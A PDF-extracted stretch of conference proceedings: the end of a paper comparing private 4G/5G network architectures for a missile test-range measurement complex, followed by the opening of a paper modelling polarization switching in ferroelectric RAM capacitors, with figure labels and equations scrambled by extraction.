– MEC (Mobile Edge Computing) is a border controller with multiple access. MEC is deployed at the edge of a network, where it is more convenient to collect information about the wireless network in real time. In addition, information can be provided to third-party service programs through open interfaces that can optimize them, improve user interaction and ensure deep integration of wireless network and services; – UPF (User Plane Function) - 5G user data transfer function is a function that performs all the work of processing the actual data moving over the radio network; – gNb are radio access networks (RAN); – 5GC-CP is a set of 5G network elements; – DN (Data network) is a data cloud. The structure of 5GC-CP and MEC is explained in Fig. 4, which shows the standard modules and functions included in these units. In the figures below, the 5GC-CP and MEC blocks will be displayed in a collapsed form. MEP (Multi-access Edge Platform) is an Edge platform with multicast. MEP collects information about the lower level network, such as the location of the UE in real time, radio channel quality, roaming status, etc., and packs information into various services such as LBS, DPI, RNIS, QoS, TCPO and others, and opens opportunities of these services for third-party programs through a single API. For example, a third-party video application can improve the quality of the video service by adjusting the bit rate when playing video based on RNI (radio network information) and QoS information. On the other hand, MEP transmits feedback information from top-level applications, such as duration of maintenance, maintenance period and subscriber mobility, to the lower-level network. RNIS (Radio Network Information Service); IoT (Internet of Things);
Implementation of Private 4G/5G Networks
739
Fig. 4. The structure of 5GC-CP and MEC, where:
AF (Application Function); UDM (Unified Data Management) is a user data management module; NEF (Network Exposure Function) - ensuring interaction with external functions; NRF (Network Resource Function) is a storage of network functions; NSSF (Network Slice Selection Function); AUSF (Authentication Server Function); PCF (Policy Control Function); SMF (Session Management Functions); AMF (Mobility Management Function); the UPF function has four different connections: N3: The interface between RAN (gNB) and UPF. N9: The interface between the two UPFs (i.e. intermediate UPF and UPF of session binding). N6: The interface between data network (DN) and UPF. N4: The interface between session management function (SMF) and UPF (hereinafter SMF is a part of 5FC-CP in all figures). Let’s consider options for building private 5G networks [12] in relation to PMCs. 1. Isolated local 5G network built for PMC (5G local frequency, completely closed, non-shared). 2. Isolated local 5G network built for PMC, created by a mobile operator (licensed frequency, completely private, non-shared). 3. Sharing of RAN between private network for PMC maintenance and public network. 4. RAN and Control Plane Sharing between private and public networks. 5. RAN and Core Sharing (End-to-End Network Slicing) between private and public networks. 6. N3 LBO (Local Breakout). 7. F1 LBO (Local Breakout).
740
I. Shostko and Y. Kulia
1. Isolated local 5G network built for PMC (5G local frequency, completely closed, non-shared) (Fig. 5).
Physically-isolated Mobile Operators 5G Network Access Core Network Network
Private Network Operators licenced freq
Test site
N2 DN
Server
Server gNB
MEC
5GC-CP
5GC-CP N2 Local gNB 5G frequency
N3
N4 N6 Optional UPF N6 Internet MEC
Private Network Traffic
N4 N3
UPF
UPF N9
N6
Internet, DN
Public network traffic
Fig. 5. Isolated local 5G network
The company servicing the PMC deploys a complete set of elements of 5G networks (gNB, UPF, 5GC CP) in a dedicated room (hangar/building). Enterprise 5G is a local (unlicensed) 5G frequency, not the licensed frequencies of mobile operators. This version of the 5G architecture is used in a number of countries where the state allocates such frequency ranges for private networks (nowadays those are the developed countries such as Japan, Germany and the United States). Who builds the network: In this case, the company that performs the maintenance of a PMC builds its own private 5G network, but depending on each government’s policy, both integrators and mobile operators can build a private 5G network for a test polygon. A company servicing the PMC can build its own local 5G network using an unlicensed 5G frequency (this issue has not been resolved in Ukraine in 2021), which will save it from the traditional leading LANs and the inconveniences associated with wireless LAN (work with cable wiring, short distances, issues with security and stability of a wireless network). In addition, ultra-low latency and ultra-high 5G connectivity allow you to expand your network or optimize your existing network. Pros (in case of a fully deployed 5G infrastructure). 1. Confidentiality and security: a private network is physically separated from public networks, providing complete data security (data traffic generated from private network devices, subscription information and information about the operation of private network devices - all of it is stored and managed only within the enterprise; data is transmitted internally and cannot be leaked). 2. Ultra-low latency: as the network delay between a device and an application server is several ms, you can implement URLLC application services.
Implementation of Private 4G/5G Networks
741
3. Complete independence from the mobile operator’s network: even if a mobile operator’s 5G network fails or the mobile operator’s equipment fails, a private 5G network will work. Cons: A company will need engineers of appropriate competence with skills in the construction and operation of 5G networks. It is difficult to buy and deploy a complete 5G network at your own expense. 2. Isolated local 5G network for PMCs created by a mobile operator (licensed frequency, completely private, non-shared) (Fig. 6).
Physically-isolated Mobile Operators 5G Network Access Core Network Network
Private Network Operators licenced freq
Test site
N2 DN
Server
Server gNB
MEC
5GC-CP
5GC-CP N2 Local gNB 5G frequency
N3
N4 N6 Optional UPF N6 Internet MEC
Private Network Traffic
N4 N3
UPF
UPF N9
N6
Internet, DN
Public network traffic
Fig. 6. Isolated 5G LAN for APCs created by a mobile operator
The architecture of a 5G private network is the same as in option 1. The only difference is that mobile operators create and operate a local 5G network for PMCs with their own licensed 5G frequencies. 3. RAN sharing between a private network for PMC maintenance and public networks (Fig. 7). UPF, 5GC CP and MEC are deployed on a PMC and physically separated from public networks. Only 5G base stations (gNBs) located within a PMC are shared by private and public networks (RAN Sharing). Data traffic (black lines) of devices belonging to a private slice (private network) is delivered to a private UPF on the territory of a PMC, data traffic (blue lines) of devices belonging to a public slice (public network) is delivered to an UPF mobile operator. In other words, private network traffic (for example, device control data, internal video, etc.) remains only within the perimeter of a PMC, and public network traffic (voice and Internet) is transmitted to the network of a mobile operator. Although base stations are separated not physically, but logically, it is virtually difficult to intercept private network data only at the RAN level, so private network data transmission for PMCs is relatively secure. Private and dedicated 5GC CPs are located on the territory of a PMC, so subscription information and information on the operation of private network devices at the facility are stored and managed inside the polygon so that they do not get outside the facility. 4. RAN and Control Plane Sharing between private and public networks (Fig. 8).
742
I. Shostko and Y. Kulia Private Network
Mobile Operators 5G Network Access Core Network Network
Licensed frequency
Test site
N2 frPariv gmate en t
Server
LAN
MEC
gNB
N4
5GC-CP N2 5G gNB
ic t bl en Pu gm Licensed fr a
frequency
N6 N4 UPF
5GC-CP N6
N3
UPF
UPF
DN
N9
N3 (GTP Tunnel MEC 1) N3 (GTP Tunnel 2)
Private Network Traffic Public network traffic
Private part (Test site) LAN
Server 5GC-CP
N2 N6 gNB
N3
N4
UPF MEC
The public part MEC
gNB
N3
gNB
N3
UPF
N4
5GC-CP
N2 N6
DN
Fig. 7. RAN sharing between private and public networks
Private UPF and MEC are installed on the territory of a PMC. 5G base stations (gNB) installed on the territory of a PMC and 5GC CP installed in the cloud of a mobile operator, shared by private and public networks (RAN and Control Plane Sharing). gNB and 5GC CP are logically separated between a private network and a public network, and UPF and MEC are physically separated and used only by a PMC. Data traffic (black lines) of devices belonging to a private slice (private network) is delivered to a private UPF on the territory of a PMC, data traffic (blue lines) of devices belonging to a public slice (public network) is delivered to the UPF to a mobile operator. In other words, private network traffic (internal device control data, internal video data, etc.) remains only in the perimeter of a PMC, and traffic of public network services (voice and Internet) is transmitted to the network of a mobile operator. As in option 3 (RAN Sharing), the security of data traffic within the facility is obvious. Control Plane functions (authentication, mobility, etc.) for private network devices and public network devices are performed in 5GC CP in the network of a mobile operator, meaning that the devices of a private network, gNB and UPF located on the territory of a PMC interact with the network of a mobile operator and are controlled by it (via interfaces N2, N4). The disadvantage of this option is that the subscription data of private network devices is stored on the server of a mobile operator, and not in the perimeter of a PMC, and the fact that the control is carried out by a cellular operator.
Implementation of Private 4G/5G Networks Private Network
743
Mobile Operators 5G Network Access Network
Licensed frequency
Test side
Core Network N2
frPariv gmate en t
Server
LAN
MEC
gNB
TP T N3 (G
ic t bl en 5G gNB Pu gm fra Licensed frequency
N6 l 1) UPF unne
5GC-CP
N2
N4 N6
I-UPF
N3
UPF
N9
DN
N4
N3 (GTP Tunnel 2)
Private Network Traffic Public network traffic
Private part (Test site) Local DN MEC N6
gNB
N3
N4 5GC-CP
UPF N2
The public part MEC
gNB gNB
N3
N3
UPF
N4
5GC-CP
N2 N6
DN
Fig. 8. RAN and Control Plane Sharing between private and public networks
Because UPF and MEC are located on the territory of a PMC, ultra-low latency communication between gNB < - > UPF is provided and is suitable for servicing optoelectronic stations for trajectory measurement in real time. 5. RAN and Core Sharing (End-to-End Network Slicing) between private and public networks (Fig. 9). This is the case when only gNBs are deployed inside a PMC, and UPF and MEC exist only for a mobile operator. Private network and public network share “5G RAN and Core” (MEC, UPF, 5GC CP) (End-to-End Network Slicing). Unlike options 3 and 4, where UPF and MEC are located on the territory of a PMC, in this case there is only gNB inside of a PMC. Therefore, there is no local junction for private traffic between 5G devices and PMC network devices, such as optoelectronic stations for trajectory measurement, so traffic should go to the mobile operator’s UPF and then return to the PMC devices via a dedicated communication channel. In addition, the MEC, which provides 5G application services for 5G devices within a PMC, is located at a mobile operator far from the OESs that broadcast a video stream. In this architecture, round-trip time (RTT) can be a serious problem if the distance between a PMC (Video Broadcasting OESs) and the operator’s equipment (UPF, MEC) is large enough.
744
I. Shostko and Y. Kulia Private Network
Mobile Operators 5G Network Access Core Network Network
Licensed frequency
Test side
N2 MEC
LAN frPariv gmate en
ME APP
5G gNB
N4
MEP
t
Dedicated line
N3
N6
N6
UPF
DN
N9
N3 (GTP Tunnel 2) N2
Private Network Traffic Public network traffic
5GCCP
N4
UPF-I
N3 (GTP Tunnel 1)
ic t bl en Pu gm a Licensed fr frequency
N6
N2
Private part (Test site): end-to-end network separation Local DN N6 MEC
gNB
N3 (GTP Tunnel 1)
N4
UPF
5GC-CP
N2
The public part MEC
gNB
gNB
N3 (GTP Tunnel 1)
N3
UPF N2
N4
5GC-CP
N6
DN
Fig. 9. RAN and Core Sharing (End-to-End Network Slicing) between private and public networks
Because traffic from private network devices is transmitted from a PMC to the mobile operator’s network, there is a problem with data traffic security. While the mobile operator allocates resources to UPF and MEC to separate private network traffic from public and other private network traffic, PMC managers will be concerned that, for example, trajectory measurement data is transmitted outside the PMC. As in option 4, the disadvantage of this option is that the subscription data of private network devices is stored on the server of a mobile operator, and not in the perimeter of a PMC, and the fact that the control is carried out by a cellular operator. This architecture is the most cost-effective for creating a private 5G network for mobile operators compared to options 2, 3 and 4, which require the deployment of UPF and/or 5GC CP within a facility. However, PMCs have security issues (data traffic generated by private network terminals, subscription information, and operational information of private network devices outside the PMC perimeter). There is also a problem with network latency between private 5G devices and MEC application servers, as well as private 5G devices and intranet/LAN devices. 6. N3 LBO (Local Breakout): Based on the decision of the SK Telecom operator in South Korea (Fig. 10).
Implementation of Private 4G/5G Networks (a)
Private Network Test side
Mobile Operators 5G Network Access Core Network Network
Licensed frequency N2
LAN
gNB
N4
MEC
N3
5GCCP N6
UPF
gNB
745
UPF
DN
N3 (GTP Tunnel)
Licensed frequency
Private Network Traffic Public network traffic
N2
The MEC Data Plane (non-3GPP equipment) has been implemented at the enterprise. MEC DP transmits local private traffic to a private network
(b)
The center of the cloud
Edge of the cloud
Licensed frequency
Test side
N2 frPariv gmate en t
LAN gNB Orchestrator/…/ MEP
Local connection MEC DP ic t gNB bl en P u gm N3 (GTP Tunnel) fra Licensed frequency
Traffic rules
5GC-CP N6
UPF
UPF
DN
N3 (GTP Tunnel)
N2 (AMF)
Private Network Traffic Public network traffic
(c)
N4 (SMF)
MEC
N3
Private part (Test site)
LAN
gNB
5GC-CP
MEC DP
Private part MEC gNB gNB
N3
N3
UPF
N4 5GC-CP N2
N6
DN
Fig. 10. N3 LBO (Local Breakout)
In figure (a), gNB is deployed on the territory of a PMC, as in option 5. GTP tunnel on the interface N3 is created between gNB and UPF when connecting the device: CCTV camera or OES. Both devices are public network devices. In figure (b), the MEC Data Plane (equipment that does not support 3GPP, ETSI MEC) and MEC Applications are installed on the territory of a PMC. The Mobile Edge Platform (MEP) and the Mobile Operator’s Orchestrator control the flow of traffic in the MEC DP. If the IP address is owned by a local PMC network, then 5G private devices, local wired network devices, and MEC local application servers exchange traffic through a local breakout.
746
I. Shostko and Y. Kulia
The MEC DP reviews the IP addresses of packets belonging to all GTP tunnels coming from gNB and forwards the user’s IP packet to the internal private network if it is local traffic with prior decapsulation from the GTP protocol. Although this method is not standardized by 3GPP, it may be possible to separate private network traffic from public traffic. Unlike in option 5, private network traffic is not transmitted to the mobile operator’s network, so the security of private network data traffic is the same as in options 3 and 4. In addition, since the MEC will also deploy PMCs and process traffic that passes through the MEC DP, it will be able to connect devices to applications with very little delay. Though MEC DP is not a 3GPP UPF device, MEC DP cannot perform mobility management and tariffing functions (charging) for private network devices. Obviously, MEC DP can achieve these functions, operators can try to create private solutions to implement this capability. Like in options 4 and 5, the disadvantages of this one are that the subscription data of private network devices is stored on the server of a mobile operator, and not in the perimeter of a PMC, and the fact that the control is carried out by the mobile operator. 7. F1 LBO (Local Breakout): An example of a KT operator in South Korea (Fig. 11).
Private Network Licensed frequency
Test side
Mobile Operators 5G Network Core Network Access Network N2
P neriva tw te or k
LAN gNB
MEC
N3
N4 (SMF)
5GC-CP
Orchestrator/…/ MEP Local connection
ic t RU/DU bl en Pu gm a fr
MEC DP
F1
Traffic rules
N6
CU
N3
UPF
UPF
DN
F1 N2 (AMF)
Licensed frequency
Private Network Traffic Public network traffic
Fig. 11. F1 LBO (Local Breakout), where:
– CU (Centralized Units); – RU (Radio Units); – DU (Distributed Units). It is almost the same as option 6, however, only RU/DU are deployed on the territory of a PMC, and the CU is located in the operator’s network, private network traffic is locally allocated from the F1 interface, not from the N3 interface. Separate architecture (between central and distributed units) allows to coordinate performance functions, load management, real-time performance optimization and provides adaptation to different applications and QoS, which must be supported when broadcasting video streams from multiple OESs. Flexible hardware and software implementations allow for scalable and cost-effective network deployment, but only if the hardware and software components
Implementation of Private 4G/5G Networks
747
are compatible and, in case they are from different vendors, are interchangeable and coherent.
4 Comparing 4G/5G Networks by Downloading Video An experiment was performed to predict the real performance of 5G and Gigabit LTEenabled devices running on a standalone architecture (SA) network [13]. The 5G NR SA macro network segment model included 20 5G NR base stations located on the same sites as existing LTE cells. The 5G NR network model operated in the 100 MHz band of the 3.5 GHz range, and the Gigabit LTE TDD core network operated in three LTE spectrum bands (3 × 20 MHz). The distribution between base stations and devices was modeled taking into account possible signal propagation losses, shading, diffraction, losses when passing through buildings, interference, etc. In addition, the simulation involved usage of various radio technologies, including Massive MIMO for 5G NR with 256 antenna elements and 4×4 MIMO for LTE TDD networks. Experiments [12] showed an increase in network bandwidth for downstream data by approximately 5 times when switching from LTE TDD with a mixture of LTE devices from different categories to 5G NR using 5G NR and Gigabit LTE multimode devices. Another significant advantage was that the average spectral efficiency increased 3 times. Measurements were performed when downloading a high-quality video (3 GB) from cloud storage, as well as when streaming 360-degree video (8K format, 120 frames per second, adaptive bitrate). The maximum download speed reached 357 Mbps, which allowed lossless transmission and playback of video in 8K resolution at 120 fps.
5 Conclusions As for performing the function of video streaming, both technologies successfully cope with the task. With a large number of OESs on the polygon, it is not necessary to broadcast from all cameras at the same time. The video stream is transmitted only from the OES, which currently follows the target. At the same time, we have a significant bandwidth reserve if we use 5G technology. In case of using 5G, the average spectral efficiency increases 3 times. Additionally, 5G provides the best network security. 5G technology provides a more flexible network structure compared to 4G. The 5G private network architecture options described above have their advantages and disadvantages, and there is no architecture which is optimal for all situations. During the construction of a PMC, it will be necessary to choose the best option based on the safety requirements, the allocated budget for implementation and operation and the terms of commissioning. Taking into account the peculiarities of a PMC, the second and third options of the 5G network architecture are the most acceptable.
References 1. Chmaytelli, M.: 5G private networks for logistics and warehousing (2021). https://www.mfatech.org/wp-content/uploads/5G-Private-Networks-for-Logistics-and-Warehousing_FINAL. pdf
748
I. Shostko and Y. Kulia
2. Duke-Woolley, R., Kokkos, A.: Uni5G Private Networks: A Simplified Path to Deployment Webinar. Beecham Research, pp. 1–22 (2021). https://www.mfa-tech.org/wp-content/ uploads/MFA_Uni5GWebinar_FINAL.pdf 3. Shahnovich, I.: Sistemi besprovodnoi svyazi 5G telekommunikacionnaya paradigma kotoraya izmenit mir. Elektronika NTB 7, 48–55 (2015) 4. Deyak, T.: Standarti mobilnogo zv’yazku 4g-5g-6g – podibnist vidminnosti perspektivi (2021). https://www.itbox.ua/ua/blog/Standarti-mobilnogo-zvyazku-4G5G6G--podibn ist-vidminnosti-perspektivi/ 5. Gladka, O.: Pobudova sistemi dlya internetu rechei. Regionalnii seminar MSE. In: Tendencii Razvitiya Konvergentnih Setei Resheniya Post ngn 4g i 5g. Kiev, Ukraine, pp. 27–29 (2016) 6. Shostko, I., Tevyashev, A., Neofitnyi, M., et al.: Information and measurement system based on wireless sensory infocommunication network for polygon testing of guided and unguided rockets and missiles. In: International Scientific-Practical Conference Problems of Infocommunications Science and Technology. 9–12 October, Kharkiv, Ukraine, pp. 705–710 (2018) 7. MulteFire Alliance: MFA TS 36.211 Physical Channels and Modulation, p. 14 (2017). https:// www.multefire.org/specification/ 8. Bubley, D.: Private LTE Networks & CBRS, pp. 1–20 (2021). https://www.ibwave.com/Mar keting/Download/ebook-private-LTE-CBRS.pdf 9. Virag, B., McDevitt, S., et al.: Private Campus Networks, pp. 1–4 (2019). https://www.adl ittle.com/sites/default/files/viewpoints/adl_private_campus_networks-min_0.pdf 10. Brown, G., Analyst, P.: Private LTE Networks, pp. 1–11 (2017). https://www.qualcomm.com/ media/documents/files/private-lte-networks.pdf 11. Harrison, J.S.: 7 Deployment Scenarios of Private 5G Networks (2019). https://www.netman ias.com/en/post/blog/14500/5g-edge-kt-sk-telecom/7-deployment-scenarios-of-private-5gnetworks 12. Polzovatelskii opit v setyah 5G NR ojidaemii v realnih usloviyah, Qualcomm (2018). https:// habr.com/ru/company/qualcomm_russia/blog/433154/
Mathematical Model of Electric Polarization Switching in a Ferroelectric Capacitor for Ferroelectric RAM Inna Baraban1 , Andriy Semenov1(B) , Serhii Baraban2 , Olena Semenova1 Mariia Baraban3 , and Andrii Rudyk4
,
1 Faculty for Infocommunications, Radioelectronics and Nanosystems, Vinnytsia National
Technical University, 95 Khmelnytske Shose Street, Vinnytsia 21021, Ukraine [email protected] 2 Faculty of Information Technologies and Computer Engineering, Vinnytsia National Technical University, 95 Khmelnytske Shose Street, Vinnytsia 21021, Ukraine [email protected] 3 Faculty for Computer Systems and Automation, Vinnytsia National Technical University, 95 Khmelnytske Shose Street, Vinnytsia 21021, Ukraine 4 Department of Automation, Electrical Engineering and Computer-Integrated Technologies, National University of Water and Environmental Engineering, 11 Soborna Street, Rivne 33028, Ukraine [email protected]
Abstract. In this paper a mathematical model of polarization switching in a ferroelectric capacitor has been developed. This model reflects adequately processes of writing and reading in elements of the FRAM-memory and may be utilized in an automated design of ferroelectric storage elements and devices. The object of research is processes of polarization switching in ferroelectric films of nanosized storage elements. The purpose of the study is to develop a mathematical model of electrical polarization switching for thin-film ferrocapacitors. A research method is applied theoretical analysis and mathematical modeling. Keywords: FRAM · polarization switching · ferroelectric capacitor · repolarization · polarizing field
1 Introduction The history of ferroelectric research began in the 1920s after Nicholson discovered anomalous dielectric properties in the ferrite salt, which were described in detail by Valashek in the same years. However, the unique properties of the ferrous salt and later discovered ferroelectrics of the potassium dihydrogen phosphate group were considered exotic exceptions and did not attract serious attention of scientists. Only after the discovery in 1944 by scientists B.M. Vul and I.M. Goldman ferroelectric properties of barium titanate the scientific community’s attention to ferroelectrics is constantly growing.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 749–770, 2023. https://doi.org/10.1007/978-3-031-35467-0_44
750
I. Baraban et al.
The growing interest in ferroelectric materials is due not only to its unique physical properties, but also the possibility of wide application in engineering. One of the promising industries for the use of ferroelectrics since its invention has always been computer technology, in which ferroelectric materials were associated with the functions of memorization and storage of information [1]. However, for a long time, until (80–90) of the last century, the implementation of these functions was constrained by the imperfection of the technology of ferroelectrics, especially in the thin-film version, which made ferroelectric memory uncompetitive with other types of memory. Advances in the technology of manufacturing ferroelectric films (chemical deposition from solution and gas phase, molecular beam epitaxy, pulsed laser deposition, etc.) [2], which date back to about the 90s of the last century, contributed to a significant improvement in film quality. The first report on the development of a practical ferroelectric storage device came from Ramtron in 1988, which manufactured a 256-bit random access memory (RAM) based on ferroelectric capacitors [3]. The new non-volatile ferroelectric storage device is called FRAM (Ferroelectric Random Access Memory), and the world-famous companies Toshiba, Samsung, Fujitsu, Hynix and others have joined the race to improve FRAM memory. Memory capacity of ferroelectric RAM up to hundreds of Mbit with a sampling time of ten nanoseconds [4]. Genie was released from the bottle and FRAM memory began to expand rapidly. The latter raised the issue of theoretical substantiation of physical processes in the elements of FRAM-memory and mathematical and computer modeling of information recording and reading processes. The first studies in this direction date back to the middle of the last century, and its results are reflected in the classic works of F. Ion, D. Sheeran “Ferroelectric crystals”, 1965; M. Lines, A. Glass, “Ferroelectrics and Related Materials,” 1981; J. Barfoot, J. Taylor, “Polar Dielectrics and Its Applications,” 1981; V.M. Rudyak “Processes of repolarization in nonlinear crystals”, 1986 and many other publications and journal articles. Since the cornerstone of FRAM memory is two metastable states, which can be changed by switching spontaneous polarization by an electric field, in theoretical terms, it is the processes of switching (repolarization) are the main issues in the development of reliable ferroelectric RAM. The repolarization of ferroelectrics has been given close attention since the first years of its research, because repolarization distinguishes ferroelectrics in a special class of active substances. But even today, the problems associated with repolarization are far from the final solution and it is suggested that a general theory of repolarization, which would cover all classes of ferroelectrics is impossible [5]. A new direction in the study of ferroelectrics, known as “research on the first principles”, has not yet yielded significant results on repolarization processes, and we quote “calculations on the first principles are suitable for studying a limited range of basic nanoelectronic devices of small complexity consisting of a large number of nanoscale elements” [6]. These circumstances have created the preconditions for FRAM memory developers to try to solve the problem of repolarization modeling by creating so-called “behavioral” models that simulate experimental results obtained for elements made according to certain technological standards [7].
Mathematical Model of Electric Polarization Switching
751
Since there are no results of experimental studies of repolarization, which would form the basis for the development of targeted behavioral model, at this stage, mathematical models of repolarization are developed based on classical results of experimental research.
2 Physical Models of Polarization Switching Physical models of polarization switching are based on real physical processes that occur in ferroelectrics during polarization reorientation. Since such processes in different ferroelectric materials differ significantly and the laws by which they obey are not definitively clarified, it is necessary to postulate a certain dependence of polarization or the rate of its change on the parameters of the ferroelectric and external action. First-Order Physical Model The first-order model assumes that the rate of change of polarization over time is proportional to the multiplication of the non-polarized part of a unit volume and the rate of its expansion. One of the first such models is the model [8]: dP = υ(PS − P)e−α / E(t) , dt
(1)
where P is the polarization, PS is the spontaneous polarization, E(t) is the electric field intensity, α (activation field) and υ (the value is inverse to the specific dielectric viscosity) are the parameters of ferromaterial. If the initial value of polarization P0 (−PS < P0 < 0), then the solution of Eq. (1) is given by the expression ⎞ ⎛ t P = PS − (PS − P0 ) exp⎝−υ e−α / E(t) dt ⎠, (2) 0
from which it follows that when t = 0, P = P0 , but when t → ∞ polarization becomes saturated P = PS only under the condition that the integral in (2) also acquires infinite values, which does not occur at any field intensity E(t). Therefore, expression (2) is analyzed for some intensities E(t) and the conditions necessary for the reorientation of the polarization are clarified. Step-by-Step Increase Field Intensity For step intensity E(t) = E1(t), where E = const, and 1(t) is the unit step function, relation (2) takes the form (3) P = PS − (PS − P0 ) exp −υte−α / E , or, under the initial condition P0 = -PS , P=
P = 1 − 2 exp −υte−α / E , PS
(4)
752
I. Baraban et al.
Fig. 1. Normalized characteristics at step intensity according to the physical model of the 1st order: a) - switching, b) – polarizing.
where P is the normalized polarization. In Fig. 1 a family of normalized switched (Fig. 1a) and polarization (Fig. 1b) characteristics are shown, built on the expression (4), on which t = υt, E = / α, P = S is the normalized values. Switching characteristics of Fig. 1a corresponds to the maximum value of the polarization current density δ(t) = dP dt at the initial moment t = 0. This phenomenon occurs in ferroelectrics, in which the process of polarization reorientation is dominated by the time required for the formation of domains and its direct growth along the field [9]. An example of such a ferroelectric can be vanadium-aluminum sulfate hexahydrate (VASH). If the lateral domain growth dominates in the process of polarization reorientation, then the initial value of the polarization current density is zero, and its maximum is observed later. An example of such a ferroelectric is barium titanate. However, the delay of the maximum current density in time may also be due to the slow increase in field intensity. On the polarization characteristics of Fig. 1b parameter is the normalized duration of polarization pulses t K = υtK , where tK is the pulse duration. The general appearance of the polarization characteristics corresponds to those observed in most ferroelectrics. Note that with a limited duration of polarization pulses, the polarization may not reach a saturated value. Important parameters of the polarization switching process are the field strength required for switching and its duration, the maximum current density and the time in which it is observed. The time required to switch the polarization from P0 to PK is by expression (3) 1 α / E 1 − P0 PS , tK = e ln (5) υ 1 − PK PS
Mathematical Model of Electric Polarization Switching
753
Having accepted P0 = −PS , PK = 0, 9PS , E = α, and υ = (0, 8 − 4, 6) · 107 s−1 (for the material BaTiO3 [6]), we will receive tK = tS = (1, 8 − 10) · 10−7 s (tS is the polarization switching time). If the switching of polarization is carried out by rectangular pulses of intensity ES and duration tK , then the field intensity required to change the polarization from P0 to PK will be determined by the expression ES =
α ,
1−P0 / PS ln υtK ln 1−P K / PS
(6)
Since ES > 0, the pulse duration must satisfy the condition 1 − P0 PS 1 , tK > ln υ 1 − PK PS from which, for the same material, we obtain tK > (0, 65 − 3, 7) · 10−7 s. For the material BaTiO3 activation field α = 104 B/ CM and for pulse duration tK = 10−6 s from expression (6) provided P0 = −PS , we find ES = (0, 37 − 1, 0) · 104 V/cm. The maximum polarization current density is observed at the initial moment (t = 0) and, by expression (3), we find
P0 −α / E dP
e δm = = υPS 1 − , (7) dt 0 PS For films BaTiO3 35 nm thick on a substrate of material SrTiO3 , PS = 35 μC/cm2 [3]. If, moreover, take υ = (0, 8 − 4, 6) · 107 s−1 , as for bulk material, and E = α, then from (7) we find the maximum current density δm ≈ (1 − 5, 9) · 102 1 − P0 PS A/cm2 , which in order coincides with the experimentally observed results. Exponential Increase Field Intensity As noted, at step field intensity, the maximum current density is observed at the initial moment (see Fig. 1a), which occurs only for individual ferromaterials. In practice, a gradual increase intensity is extremely difficult to achieve. Therefore, consider the law of increasing intensity E(t) = E 1 − e−γ t , (8) which only when γ → ∞ converted into step intensity, and at small γ and limited time, reflects the linear law of growth of intensity. Let’s find out what will be the density of the polarizing current at the initial moment (t = 0), if the change intensity is determined by the expression (8). To do this, we decompose the exponent in expression (8) into the McLaren series 1 1 E(t) = E γ t − γ 2 t 2 + γ 3 t 3 − ... . 2 6
754
I. Baraban et al.
At small t (t < < 1 γ ) E(t) ≈ γ Et, where γ E is the rate of linear increase of intensity at the initial stage of switching polarization. Limiting ourselves to the consideration of small t, we transform relation (2) into the form P P0 αυ ≈1− 1− exp − F(x) , (9) PS PS γE where x = α γ Et, function F(x) is defined by an expression F(x) =
1 −x e + Ei (−x), x
and ∞ Ei (−x) = −
1 −x e dx x
x
is the integral exponential function [10]. Relation (9) allows us to find the rate of change of polarization at the initial stage with a linear increase in intensity d P PS αυ P0 α 2 υ 2 . F exp − ≈− 1− F(x) (x) dt PS γ 2 E 2 t 2 x γE For the small t (t → 0) and large respectively (x → ∞) function E i (-x) can be presented by series [10] 1! 3! e−x 2! 1 − + 2 − 3 + ... . Ei (−x) ≈ −x x x x Restricted to the first two members of the last row, we obtain 1 1 1 −x 1 −x 1− = 2 e−x , F(x) ≈ e − e x x x x where do we find
d P PS αυ P0 exp − ≈ 1− − υtxF(x) , dt PS γ Et
and, finally d P PS α P0 exp − ≈ 1− dt PS γ Et Since the coefficient γ can be arbitrarily large, but not infinite, then t = 0 d P PS d P PS
lim =
=0
t→0 dt dt 0
Mathematical Model of Electric Polarization Switching
755
at any polarization P0 and at any (but not infinite) rate of increase in field intensity at the initial stage. Since the derivative of polarization determines the current density, the polarization current at the initial stage is also zero. In Fig. 2 a normalized family of switching (Fig. 2a) and polarization (Fig. 2b) characteristics, with increasing voltage according to the law (8) are shown, where t = υt, E = E / α, γ = γ υ.
Fig. 2. Normalized characteristics at exponential increase of intensity according to the model of the 1st order: a) switching; b) polarization.
We find, further, the maximum value of the current density δm and the time at which this maximum is observed. Rewriting expression (2) in the form ⎤ ⎡ t −γ t P = PS − (PS − P0 ) exp⎣−υ e−α E (1−e ) dt ⎦, 0
we find ⎤ ⎡ t dP α −γ t − υ e−α E (1−e ) dt ⎦. = υ(PS − P0 ) exp⎣− δ(t) = dt E 1 − e−γ t
(10)
0
Since the argument of the external exponent can only take negative values, the maximum current density will correspond to the minimum of its modulus. Differentiating the modulus of the argument over time and equating the derivative to zero, we obtain the condition of maximum current density e−γ t αγ −α E (1−e−γ t ) 2 = e υE 1 − e−γ t
(11)
756
I. Baraban et al.
Equation (11) can be solved with respect to the variable t only by numerical methods for certain values α, γ , υ and E. In normalized form, Eq. (11) is written x (1 − x)2
= e−1/ (1−x) ,
(12)
where taken E α = 1, γ υ = 1, and x = exp(−γ t). Since the value of x is positive and does not exceed 0 < x < 1, Eq. (12) has only one solution x m ≈ 0,1905, and the corresponding value of time at which the current density is maximum is determined tm ≈
1 1 ln ≈ 1, 658 υ. υ xm
For ferroelectric material BaTiO3 , which υ = (0, 8 − 4, 6) · 107 s−1 , we will receive tm ≈ (0, 36 − 2, 1) · 10−7 s. The maximum value of the current density is by expression (10), in which, for the selected ratio between the parameters E α = 1, γ υ = 1, need to take exp(−γ t) = x m ≈ 0,1905, and as the upper bound of the integral t = t m ≈ 1, 658 υ. Appropriate calculations give the result P0 2 , A/cm2 . δm ≈ (0, 63 − 3, 64) · 10 1 − (13) PS It should be noted that for the same material, the maximum current density at step voltage is greater than at exponential, but the latter is observed later. These differences are not due to processes in ferroelectrics, and the law of increasing voltage. The switching time of polarization at exponential intensity can be estimated only by numerical methods. However, it is hoped that this time will be of the same order as the switching time at step voltage. Second-Order Physical Model As noted, in the first-order physical model, the maximum current density at step voltage is observed at the initial stage, which occurs only in some ferroelectrics with specific polarization mechanisms. In most ferroelectrics with a perovskite structure, the maximum of the polarization current is delayed in time. This feature, to some extent, is realized by the physical model of the second order [6] dP P 2 −α / E(t) = υPS 1 − 2 e , (14) dt PS where the content of the values is the same as in the model (1). In the second-order model, the rate of change of polarization nonlinearly depends on the polarization. It is maximum when the modular polarization is minimal and vice versa. Therefore, the polarization at the beginning and end of the polarization process will change more slowly than in the model of the 1st order and faster in the middle.
Mathematical Model of Electric Polarization Switching
757
